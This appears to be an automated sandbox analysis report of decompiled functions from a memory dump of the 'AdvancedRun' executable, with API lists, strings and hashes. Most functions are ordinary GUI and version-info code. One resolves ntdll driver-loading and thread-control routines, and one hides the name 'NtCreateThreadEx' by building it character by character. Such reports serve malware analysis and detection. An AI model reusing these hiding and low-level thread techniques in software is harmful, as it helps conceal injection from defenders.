API String ID: 1572607441-20550370
Opcode ID: 10f7c0c23a9a0f5367f9f105db89101955ccd8852da439e16b2e798f9a4d6596
Instruction ID: 438c2ff444ec8f0d87d8749b995af300a635889f814f068fc812e1417cff7fa3
Opcode Fuzzy Hash: 10f7c0c23a9a0f5367f9f105db89101955ccd8852da439e16b2e798f9a4d6596
Instruction Fuzzy Hash: 557127B1800219EFCB109FA0DD8499E7BB5FF08344F14457AF949B6290CB799E90DF59

Uniqueness

Uniqueness Score: -1.00%

Function 00401093, Relevance: 47.4, APIs: 26, Strings: 1, Instructions: 184
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00401093(void* __ecx, void* __edx, intOrPtr _a4, struct HDC__* _a8, unsigned int _a12) {
				struct tagPOINT _v12;
				void* __esi;
				void* _t47;
				struct HBRUSH__* _t56;
				void* _t61;
				unsigned int _t63;
				void* _t68;
				struct HWND__* _t69;
				struct HWND__* _t70;
				void* _t73;
				unsigned int _t74;
				struct HWND__* _t76;
				struct HWND__* _t77;
				struct HWND__* _t78;
				struct HWND__* _t79;
				unsigned int _t85;
				struct HWND__* _t87;
				struct HWND__* _t89;
				struct HWND__* _t90;
				struct tagPOINT _t96;
				struct tagPOINT _t98;
				signed short _t103;
				void* _t106;
				void* _t117;

				_t106 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t47 = _a4 - 0x110;
				_t117 = __ecx;
				if(_t47 == 0) {
					__eflags =  *0x40feb0;
					if(__eflags != 0) {
						SetDlgItemTextW( *(__ecx + 0x10), 0x3ee, 0x40feb0);
					} else {
						ShowWindow(GetDlgItem( *(__ecx + 0x10), 0x3ed), 0);
						ShowWindow(GetDlgItem( *(_t117 + 0x10), 0x3ee), 0);
					}
					SetWindowTextW( *(_t117 + 0x10), L"AdvancedRun");
					SetDlgItemTextW( *(_t117 + 0x10), 0x3ea, _t117 + 0x40);
					SetDlgItemTextW( *(_t117 + 0x10), 0x3ec, _t117 + 0x23e);
					E0040103E(_t117, __eflags);
					E00404DA9(_t106,  *(_t117 + 0x10), 4);
					goto L30;
				} else {
					_t61 = _t47 - 1;
					if(_t61 == 0) {
						_t103 = _a8;
						_t63 = _t103 >> 0x10;
						__eflags = _t103 - 1;
						if(_t103 == 1) {
							L24:
							__eflags = _t63;
							if(_t63 != 0) {
								goto L30;
							} else {
								EndDialog( *(_t117 + 0x10), _t103 & 0x0000ffff);
								DeleteObject( *(_t117 + 0x43c));
								goto L8;
							}
						} else {
							__eflags = _t103 - 2;
							if(_t103 != 2) {
								goto L30;
							} else {
								goto L24;
							}
						}
					} else {
						_t68 = _t61 - 0x27;
						if(_t68 == 0) {
							_t69 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
							__eflags = _a12 - _t69;
							if(_a12 != _t69) {
								__eflags =  *0x40ff30;
								if( *0x40ff30 == 0) {
									goto L30;
								} else {
									_t70 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
									__eflags = _a12 - _t70;
									if(_a12 != _t70) {
										goto L30;
									} else {
										goto L18;
									}
								}
							} else {
								L18:
								SetBkMode(_a8, 1);
								SetTextColor(_a8, 0xc00000);
								_t56 = GetSysColorBrush(0xf);
							}
						} else {
							_t73 = _t68 - 0xc8;
							if(_t73 == 0) {
								_t74 = _a12;
								_t96 = _t74 & 0x0000ffff;
								_v12.x = _t96;
								_v12.y = _t74 >> 0x10;
								_t76 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
								_push(_v12.y);
								_a8 = _t76;
								_t77 = ChildWindowFromPoint( *(_t117 + 0x10), _t96);
								__eflags = _t77 - _a8;
								if(_t77 != _a8) {
									__eflags =  *0x40ff30;
									if( *0x40ff30 == 0) {
										goto L30;
									} else {
										_t78 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
										_push(_v12.y);
										_t79 = ChildWindowFromPoint( *(_t117 + 0x10), _v12.x);
										__eflags = _t79 - _t78;
										if(_t79 != _t78) {
											goto L30;
										} else {
											goto L13;
										}
									}
								} else {
									L13:
									SetCursor(LoadCursorW(GetModuleHandleW(0), 0x67));
									goto L8;
								}
							} else {
								if(_t73 != 0) {
									L30:
									_t56 = 0;
									__eflags = 0;
								} else {
									_t85 = _a12;
									_t98 = _t85 & 0x0000ffff;
									_v12.x = _t98;
									_v12.y = _t85 >> 0x10;
									_t87 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
									_push(_v12.y);
									_a8 = _t87;
									if(ChildWindowFromPoint( *(_t117 + 0x10), _t98) != _a8) {
										__eflags =  *0x40ff30;
										if( *0x40ff30 == 0) {
											goto L30;
										} else {
											_t89 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
											_push(_v12.y);
											_t90 = ChildWindowFromPoint( *(_t117 + 0x10), _v12);
											__eflags = _t90 - _t89;
											if(_t90 != _t89) {
												goto L30;
											} else {
												_push(0x40ff30);
												goto L7;
											}
										}
									} else {
										_push(_t117 + 0x23e);
										L7:
										_push( *(_t117 + 0x10));
										E00404F7E();
										L8:
										_t56 = 1;
									}
								}
							}
						}
					}
				}
				return _t56;
			}

APIs

GetDlgItem.USER32 ref: 004010EB
ChildWindowFromPoint.USER32 ref: 004010FD
GetDlgItem.USER32 ref: 00401133
ChildWindowFromPoint.USER32 ref: 00401140
GetDlgItem.USER32 ref: 0040116E
ChildWindowFromPoint.USER32 ref: 00401180
GetModuleHandleW.KERNEL32(00000000,?,?), ref: 00401189
LoadCursorW.USER32(00000000,00000067), ref: 00401192
SetCursor.USER32(00000000,?,?), ref: 00401199
GetDlgItem.USER32 ref: 004011BA
ChildWindowFromPoint.USER32 ref: 004011C7
GetDlgItem.USER32 ref: 004011E1
SetBkMode.GDI32(?,00000001), ref: 004011ED
SetTextColor.GDI32(?,00C00000), ref: 004011FB
GetSysColorBrush.USER32(0000000F), ref: 00401203
GetDlgItem.USER32 ref: 00401224
EndDialog.USER32(?,?), ref: 00401259
DeleteObject.GDI32(?), ref: 00401265
GetDlgItem.USER32 ref: 0040128A
ShowWindow.USER32(00000000), ref: 00401293
GetDlgItem.USER32 ref: 0040129F
ShowWindow.USER32(00000000), ref: 004012A2
SetDlgItemTextW.USER32 ref: 004012B3
SetWindowTextW.USER32(?,AdvancedRun), ref: 004012C1
SetDlgItemTextW.USER32 ref: 004012D9
SetDlgItemTextW.USER32 ref: 004012EA

Strings

AdvancedRun, xrefs: 004012B9

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
String ID: AdvancedRun
API String ID: 829165378-481304740
Opcode ID: a07d2d5b487f31c3e1d27064e8330fba163acc1cc8c3fec135df1b57c4fd270f
Instruction ID: 224fbb10fd18d8c83ffedf6f1f5ae1765c75c0bde1a98b5884793aa0480d770d
Opcode Fuzzy Hash: a07d2d5b487f31c3e1d27064e8330fba163acc1cc8c3fec135df1b57c4fd270f
Instruction Fuzzy Hash: 12517D31510308EBDB216FA0DD84E6A7BB6FB44304F104A3AFA11B65F1CB79A954EB18

Uniqueness

Uniqueness Score: -1.00%

Function 00408E31, Relevance: 45.6, APIs: 13, Strings: 13, Instructions: 57
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00408E31() {
				void* _t1;
				struct HINSTANCE__* _t2;
				_Unknown_base(*)()* _t14;

				if( *0x41c4ac == 0) {
					_t2 = GetModuleHandleW(L"ntdll.dll");
					 *0x41c4ac = _t2;
					 *0x41c47c = GetProcAddress(_t2, "NtQuerySystemInformation");
					 *0x41c480 = GetProcAddress( *0x41c4ac, "NtLoadDriver");
					 *0x41c484 = GetProcAddress( *0x41c4ac, "NtUnloadDriver");
					 *0x41c488 = GetProcAddress( *0x41c4ac, "NtOpenSymbolicLinkObject");
					 *0x41c48c = GetProcAddress( *0x41c4ac, "NtQuerySymbolicLinkObject");
					 *0x41c490 = GetProcAddress( *0x41c4ac, "NtQueryObject");
					 *0x41c494 = GetProcAddress( *0x41c4ac, "NtOpenThread");
					 *0x41c498 = GetProcAddress( *0x41c4ac, "NtClose");
					 *0x41c49c = GetProcAddress( *0x41c4ac, "NtQueryInformationThread");
					 *0x41c4a0 = GetProcAddress( *0x41c4ac, "NtSuspendThread");
					 *0x41c4a4 = GetProcAddress( *0x41c4ac, "NtResumeThread");
					_t14 = GetProcAddress( *0x41c4ac, "NtTerminateThread");
					 *0x41c4a8 = _t14;
					return _t14;
				}
				return _t1;
			}

APIs

GetModuleHandleW.KERNEL32(ntdll.dll,?,004097C3), ref: 00408E44
GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00408E5B
GetProcAddress.KERNEL32(NtLoadDriver), ref: 00408E6D
GetProcAddress.KERNEL32(NtUnloadDriver), ref: 00408E7F
GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 00408E91
GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 00408EA3
GetProcAddress.KERNEL32(NtQueryObject), ref: 00408EB5
GetProcAddress.KERNEL32(NtOpenThread), ref: 00408EC7
GetProcAddress.KERNEL32(NtClose), ref: 00408ED9
GetProcAddress.KERNEL32(NtQueryInformationThread), ref: 00408EEB
GetProcAddress.KERNEL32(NtSuspendThread), ref: 00408EFD
GetProcAddress.KERNEL32(NtResumeThread), ref: 00408F0F
GetProcAddress.KERNEL32(NtTerminateThread), ref: 00408F21

Strings

NtResumeThread, xrefs: 00408EFF
NtOpenSymbolicLinkObject, xrefs: 00408E81
NtSuspendThread, xrefs: 00408EED
NtUnloadDriver, xrefs: 00408E6F
NtQueryObject, xrefs: 00408EA5
NtQuerySystemInformation, xrefs: 00408E50
NtLoadDriver, xrefs: 00408E5D
NtTerminateThread, xrefs: 00408F11
NtQueryInformationThread, xrefs: 00408EDB
NtQuerySymbolicLinkObject, xrefs: 00408E93
NtClose, xrefs: 00408EC9
ntdll.dll, xrefs: 00408E3F
NtOpenThread, xrefs: 00408EB7

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$HandleModule
String ID: NtClose$NtLoadDriver$NtOpenSymbolicLinkObject$NtOpenThread$NtQueryInformationThread$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeThread$NtSuspendThread$NtTerminateThread$NtUnloadDriver$ntdll.dll
API String ID: 667068680-4280973841
Opcode ID: 0e514bbc216ec6ed683cf9c679d1a897357692730977d90f559606f31b4d1217
Instruction ID: 9046f7da5280d7be643cb990a4133c03c86fae9b85e8e19c009a309f84c5646f
Opcode Fuzzy Hash: 0e514bbc216ec6ed683cf9c679d1a897357692730977d90f559606f31b4d1217
Instruction Fuzzy Hash: 6611AD74DC8315EECB516FB1BCE9AA67E61EB08760710C437A809632B1D77A8018DF4C

Uniqueness

Uniqueness Score: -1.00%

Function 00408ADB, Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 216
windowCOMMON

Download Yara Rule

C-Code - Quality: 45%

			E00408ADB(void* __ecx, void* __edx, void* __eflags, struct HWND__* _a4, void* _a8, unsigned int _a12) {
				void _v259;
				void _v260;
				void _v515;
				void _v516;
				char _v1048;
				void _v1052;
				void _v1056;
				void _v1560;
				long _v1580;
				void _v3626;
				char _v3628;
				void _v5674;
				char _v5676;
				void _v9770;
				short _v9772;
				void* __edi;
				void* _t45;
				void* _t60;
				int _t61;
				int _t63;
				int _t64;
				long _t68;
				struct HWND__* _t94;
				signed int _t103;
				intOrPtr _t127;
				unsigned int _t130;
				void* _t132;
				void* _t135;

				E0040B550(0x2628, __ecx);
				_t45 = _a8 - 0x110;
				if(_t45 == 0) {
					E00404DA9(__edx, _a4, 4);
					_v9772 = 0;
					memset( &_v9770, 0, 0xffe);
					_t103 = 5;
					memcpy( &_v1580, L"{Unknown}", _t103 << 2);
					memset( &_v1560, 0, 0x1f6);
					_v260 = 0;
					memset( &_v259, 0, 0xff);
					_v516 = 0;
					memset( &_v515, 0, 0xff);
					_v5676 = 0;
					memset( &_v5674, 0, 0x7fe);
					_v3628 = 0;
					memset( &_v3626, 0, 0x7fe);
					_t135 = _t132 + 0x5c;
					_t60 = GetCurrentProcess();
					_t105 =  &_v260;
					_a8 = _t60;
					_t61 = ReadProcessMemory(_t60,  *0x40f3bc,  &_v260, 0x80, 0);
					__eflags = _t61;
					if(_t61 != 0) {
						E00404FE0( &_v5676,  &_v260, 4);
						_pop(_t105);
					}
					_t63 = ReadProcessMemory(_a8,  *0x40f3b0,  &_v516, 0x80, 0);
					__eflags = _t63;
					if(_t63 != 0) {
						E00404FE0( &_v3628,  &_v516, 0);
						_pop(_t105);
					}
					_t64 = E00404BD3();
					__eflags = _t64;
					if(_t64 == 0) {
						E004090EE();
					} else {
						E00409172();
					}
					__eflags =  *0x4101b8;
					if(__eflags != 0) {
						L17:
						_v1056 = 0;
						memset( &_v1052, 0, 0x218);
						_t127 =  *0x40f5d4; // 0x0
						_t135 = _t135 + 0xc;
						_t68 = GetCurrentProcessId();
						_push(_t127);
						_push(_t68);
						 *0x40f84c = 0;
						E004092F0(_t105, __eflags);
						__eflags =  *0x40f84c; // 0x0
						if(__eflags != 0) {
							memcpy( &_v1056, 0x40f850, 0x21c);
							_t135 = _t135 + 0xc;
							__eflags =  *0x40f84c; // 0x0
							if(__eflags != 0) {
								wcscpy( &_v1580, E00404B3E( &_v1048));
							}
						}
						goto L20;
					} else {
						__eflags =  *0x4101bc;
						if(__eflags == 0) {
							L20:
							_push( &_v3628);
							_push( &_v5676);
							_push( *0x40f3b0);
							_push( *0x40f3bc);
							_push( *0x40f3ac);
							_push( *0x40f394);
							_push( *0x40f398);
							_push( *0x40f3a0);
							_push( *0x40f3a4);
							_push( *0x40f39c);
							_push( *0x40f3a8);
							_push( &_v1580);
							_push( *0x40f5d4);
							_push( *0x40f5c8);
							_push(L"Exception %8.8X at address %8.8X in module %s\r\nRegisters: \r\nEAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8X\r\nESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8X\r\nEIP=%8.8X\r\nStack Data: %s\r\nCode Data: %s\r\n");
							_push(0x800);
							_push( &_v9772);
							L0040B1EC();
							SetDlgItemTextW(_a4, 0x3ea,  &_v9772);
							SetFocus(GetDlgItem(_a4, 0x3ea));
							L21:
							return 0;
						}
						goto L17;
					}
				}
				if(_t45 == 1) {
					_t130 = _a12;
					if(_t130 >> 0x10 == 0) {
						if(_t130 == 3) {
							_t94 = GetDlgItem(_a4, 0x3ea);
							_a4 = _t94;
							SendMessageW(_t94, 0xb1, 0, 0xffff);
							SendMessageW(_a4, 0x301, 0, 0);
							SendMessageW(_a4, 0xb1, 0, 0);
						}
					}
				}
				goto L21;
			}

APIs

EndDialog.USER32(?,?), ref: 00408B20
GetDlgItem.USER32 ref: 00408B38
SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00408B56
SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00408B62
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00408B6A
memset.MSVCRT ref: 00408B91
memset.MSVCRT ref: 00408BB3
memset.MSVCRT ref: 00408BCC
memset.MSVCRT ref: 00408BE0
memset.MSVCRT ref: 00408BFA
memset.MSVCRT ref: 00408C12
GetCurrentProcess.KERNEL32 ref: 00408C1A
ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 00408C3D
ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 00408C6F
memset.MSVCRT ref: 00408CC2
GetCurrentProcessId.KERNEL32 ref: 00408CD0
memcpy.MSVCRT ref: 00408CFE
wcscpy.MSVCRT ref: 00408D21
_snwprintf.MSVCRT ref: 00408D90
SetDlgItemTextW.USER32 ref: 00408DA8
GetDlgItem.USER32 ref: 00408DB2
SetFocus.USER32(00000000), ref: 00408DB9

Strings

{Unknown}, xrefs: 00408BA5
Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00408D85

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
API String ID: 4111938811-1819279800
Opcode ID: da6163a693f44e98dc338dc238bd85c57536ed619285caa4b2ce51e2a39adb2b
Instruction ID: 89cdabe1f300c5598f457b205db6f7bf21b56caa474a1127ebd0a37068e91017
Opcode Fuzzy Hash: da6163a693f44e98dc338dc238bd85c57536ed619285caa4b2ce51e2a39adb2b
Instruction Fuzzy Hash: FD7184B280021DBEDB219B51DD85EDB377CEF08354F0444BAFA08B6191DB799E848F68

Uniqueness

Uniqueness Score: -1.00%

Function 0040B04D, Relevance: 33.4, APIs: 8, Strings: 11, Instructions: 139
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0040B04D(intOrPtr* __edi, short* _a4) {
				int _v8;
				void* _v12;
				void* _v16;
				int _v20;
				long _v60;
				char _v572;
				void* __esi;
				int _t47;
				void* _t50;
				signed short* _t76;
				void* _t81;
				void* _t84;
				intOrPtr* _t96;
				int _t97;

				_t96 = __edi;
				_t97 = 0;
				_v20 = 0;
				_t47 = GetFileVersionInfoSizeW(_a4,  &_v20);
				_v8 = _t47;
				if(_t47 > 0) {
					_t50 = E00405AA7(__edi);
					_push(_v8);
					L0040B26C();
					_t84 = _t50;
					GetFileVersionInfoW(_a4, 0, _v8, _t84);
					if(VerQueryValueW(_t84, "\\",  &_v12,  &_v8) != 0) {
						_t81 = _v12;
						_t11 = _t81 + 0x30; // 0x4d46e853
						 *((intOrPtr*)(__edi + 4)) =  *_t11;
						_t13 = _t81 + 8; // 0x8d50ffff
						 *__edi =  *_t13;
						_t14 = _t81 + 0x14; // 0x5900004d
						 *((intOrPtr*)(__edi + 0xc)) =  *_t14;
						_t16 = _t81 + 0x10; // 0x65e850ff
						 *((intOrPtr*)(__edi + 8)) =  *_t16;
						_t18 = _t81 + 0x24; // 0xf4680000
						 *((intOrPtr*)(__edi + 0x10)) =  *_t18;
						_t20 = _t81 + 0x28; // 0xbb0040cd
						 *((intOrPtr*)(__edi + 0x14)) =  *_t20;
					}
					if(VerQueryValueW(_t84, L"\\VarFileInfo\\Translation",  &_v16,  &_v8) == 0) {
						L5:
						wcscpy( &_v60, L"040904E4");
					} else {
						_t76 = _v16;
						_push(_t76[1] & 0x0000ffff);
						_push( *_t76 & 0x0000ffff);
						_push(L"%4.4X%4.4X");
						_push(0x14);
						_push( &_v60);
						L0040B1EC();
						if(E0040AFBE( &_v572, _t84,  &_v60, 0x40c4e8) == 0) {
							goto L5;
						}
					}
					E0040AFBE(_t96 + 0x18, _t84,  &_v60, L"ProductName");
					E0040AFBE(_t96 + 0x218, _t84,  &_v60, L"FileDescription");
					E0040AFBE(_t96 + 0x418, _t84,  &_v60, L"FileVersion");
					E0040AFBE(_t96 + 0x618, _t84,  &_v60, L"ProductVersion");
					E0040AFBE(_t96 + 0x818, _t84,  &_v60, L"CompanyName");
					E0040AFBE(_t96 + 0xa18, _t84,  &_v60, L"InternalName");
					E0040AFBE(_t96 + 0xc18, _t84,  &_v60, L"LegalCopyright");
					E0040AFBE(_t96 + 0xe18, _t84,  &_v60, L"OriginalFileName");
					_push(_t84);
					_t97 = 1;
					L0040B272();
				}
				return _t97;
			}

APIs

GetFileVersionInfoSizeW.VERSION(004064D2,?,00000000), ref: 0040B063
??2@YAPAXI@Z.MSVCRT ref: 0040B07E
GetFileVersionInfoW.VERSION(004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B08E
VerQueryValueW.VERSION(00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0A1
VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0DE
_snwprintf.MSVCRT ref: 0040B0FE
wcscpy.MSVCRT ref: 0040B128
??3@YAXPAX@Z.MSVCRT ref: 0040B1D8

Strings

CompanyName, xrefs: 0040B180
LegalCopyright, xrefs: 0040B1AA
FileDescription, xrefs: 0040B141
InternalName, xrefs: 0040B195
\VarFileInfo\Translation, xrefs: 0040B0D8
FileVersion, xrefs: 0040B156
ProductVersion, xrefs: 0040B16B
040904E4, xrefs: 0040B122
OriginalFileName, xrefs: 0040B1BF
ProductName, xrefs: 0040B12F
%4.4X%4.4X, xrefs: 0040B0F3

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: FileInfoQueryValueVersion$??2@??3@Size_snwprintfwcscpy
String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
API String ID: 1223191525-1542517562
Opcode ID: 7d0a25dbe63dd51685ec4fd467e5617a4705a8ce8e8c15efb6301eb2ec3eaad9
Instruction ID: 283451b663653e95218ba9e6ce5340ec929c4f2fba7a9b8c11281d5ea0e9195a
Opcode Fuzzy Hash: 7d0a25dbe63dd51685ec4fd467e5617a4705a8ce8e8c15efb6301eb2ec3eaad9
Instruction Fuzzy Hash: E34144B2940219BAC704EBA5DD41DDEB7BDEF08704F100177B905B3181DB78AA59CBD8

Uniqueness

Uniqueness Score: -1.00%

Function 0040A1EF, Relevance: 33.3, APIs: 2, Strings: 17, Instructions: 47
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E0040A1EF(struct HINSTANCE__** __esi) {
				char _v8;
				char _v9;
				char _v10;
				char _v11;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				char _v16;
				char _v17;
				char _v18;
				char _v19;
				char _v20;
				char _v21;
				char _v22;
				char _v23;
				char _v24;
				struct HINSTANCE__* _t27;

				if( *__esi != 0) {
					L3:
					return 1;
				}
				_t27 = LoadLibraryW(L"ntdll.dll");
				 *__esi = _t27;
				if(_t27 != 0) {
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosw");
					asm("stosb");
					_v24 = 0x4e;
					_v23 = 0x74;
					_v13 = 0x65;
					_v12 = 0x61;
					_v18 = 0x74;
					_v17 = 0x65;
					_v22 = 0x43;
					_v14 = 0x72;
					_v11 = 0x64;
					_v21 = 0x72;
					_v10 = 0x45;
					_v9 = 0x78;
					_v20 = 0x65;
					_v19 = 0x61;
					_v16 = 0x54;
					_v15 = 0x68;
					_v8 = 0;
					__esi[1] = GetProcAddress(_t27,  &_v24);
					goto L3;
				}
				return 0;
			}

APIs

LoadLibraryW.KERNEL32(ntdll.dll,?,?,?,?,0040A2A4), ref: 0040A1FF
GetProcAddress.KERNEL32(00000000,?), ref: 0040A263

Strings

h, xrefs: 0040A25B
C, xrefs: 0040A237
t, xrefs: 0040A223
x, xrefs: 0040A24B
e, xrefs: 0040A233
e, xrefs: 0040A24F
r, xrefs: 0040A23B
a, xrefs: 0040A253
T, xrefs: 0040A257
e, xrefs: 0040A227
r, xrefs: 0040A243
ntdll.dll, xrefs: 0040A1FA
N, xrefs: 0040A21F
d, xrefs: 0040A23F
E, xrefs: 0040A247
a, xrefs: 0040A22B
t, xrefs: 0040A22F

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID: C$E$N$T$a$a$d$e$e$e$h$ntdll.dll$r$r$t$t$x
API String ID: 2574300362-1257427173
Opcode ID: 7c4b767998ad850fb5a7cf24f594afd5e084a11fa120f3cae330cd392d2e2909
Instruction ID: 28a3addb3bc40b583479f690f9d6e65064931713b616a12c977b5f47a4008353
Opcode Fuzzy Hash: 7c4b767998ad850fb5a7cf24f594afd5e084a11fa120f3cae330cd392d2e2909
Instruction Fuzzy Hash: 08110A2090C6C9EDEB12C7FCC40879EBEF15B26709F0881ECC585B6292C6BA5758C776

Uniqueness

Uniqueness Score: -1.00%

Function 00407F8D, Relevance: 33.1, APIs: 22, Instructions: 137
windowCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E00407F8D(void* __eax) {
				struct _SHFILEINFOW _v692;
				void _v1214;
				short _v1216;
				void* _v1244;
				void* _v1248;
				void* _v1252;
				void* _v1256;
				void* _v1268;
				void* _t37;
				long _t38;
				long _t46;
				long _t48;
				long _t58;
				void* _t62;
				intOrPtr* _t64;

				_t64 = ImageList_Create;
				_t62 = __eax;
				if( *((intOrPtr*)(__eax + 0x2b4)) != 0) {
					if( *((intOrPtr*)(__eax + 0x2bc)) == 0) {
						_t48 = ImageList_Create(0x10, 0x10, 0x19, 1, 1);
						 *(_t62 + 0x2a8) = _t48;
						__imp__ImageList_SetImageCount(_t48, 0);
						_push( *(_t62 + 0x2a8));
					} else {
						_v692.hIcon = 0;
						memset( &(_v692.iIcon), 0, 0x2b0);
						_v1216 = 0;
						memset( &_v1214, 0, 0x208);
						GetWindowsDirectoryW( &_v1216, 0x104);
						_t58 = SHGetFileInfoW( &_v1216, 0,  &_v692, 0x2b4, 0x4001);
						 *(_t62 + 0x2a8) = _t58;
						_push(_t58);
					}
					SendMessageW( *(_t62 + 0x2a0), 0x1003, 1, ??);
				}
				if( *((intOrPtr*)(_t62 + 0x2b8)) != 0) {
					_t46 =  *_t64(0x20, 0x20, 0x19, 1, 1);
					 *(_t62 + 0x2ac) = _t46;
					__imp__ImageList_SetImageCount(_t46, 0);
					SendMessageW( *(_t62 + 0x2a0), 0x1003, 0,  *(_t62 + 0x2ac));
				}
				 *(_t62 + 0x2a4) =  *_t64(0x10, 0x10, 0x19, 1, 1);
				_v1248 = LoadImageW(GetModuleHandleW(0), 0x85, 0, 0x10, 0x10, 0x1000);
				_t37 = LoadImageW(GetModuleHandleW(0), 0x86, 0, 0x10, 0x10, 0x1000);
				_v1244 = _t37;
				__imp__ImageList_SetImageCount( *(_t62 + 0x2a4), 0);
				_t38 = GetSysColor(0xf);
				_v1248 = _t38;
				ImageList_AddMasked( *(_t62 + 0x2a4), _v1256, _t38);
				ImageList_AddMasked( *(_t62 + 0x2a4), _v1252, _v1248);
				DeleteObject(_v1268);
				DeleteObject(_v1268);
				return SendMessageW(E0040331D( *(_t62 + 0x2a0)), 0x1208, 0,  *(_t62 + 0x2a4));
			}

APIs

memset.MSVCRT ref: 00407FD0
memset.MSVCRT ref: 00407FE5
GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00407FF7
SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 00408015
ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 0040802E
ImageList_SetImageCount.COMCTL32(00000000,00000000), ref: 00408038
SendMessageW.USER32(?,00001003,00000001,?), ref: 00408051
ImageList_Create.COMCTL32(00000020,00000020,00000019,00000001,00000001), ref: 00408065
ImageList_SetImageCount.COMCTL32(00000000,00000000), ref: 0040806F
SendMessageW.USER32(?,00001003,00000000,?), ref: 00408087
ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 00408093
GetModuleHandleW.KERNEL32(00000000), ref: 004080A2
LoadImageW.USER32 ref: 004080B4
GetModuleHandleW.KERNEL32(00000000), ref: 004080BF
LoadImageW.USER32 ref: 004080D1
ImageList_SetImageCount.COMCTL32(?,00000000), ref: 004080E2
GetSysColor.USER32(0000000F), ref: 004080EA
ImageList_AddMasked.COMCTL32(?,00000000,00000000), ref: 00408105
ImageList_AddMasked.COMCTL32(?,?,?), ref: 00408115
DeleteObject.GDI32(?), ref: 00408121
DeleteObject.GDI32(?), ref: 00408127
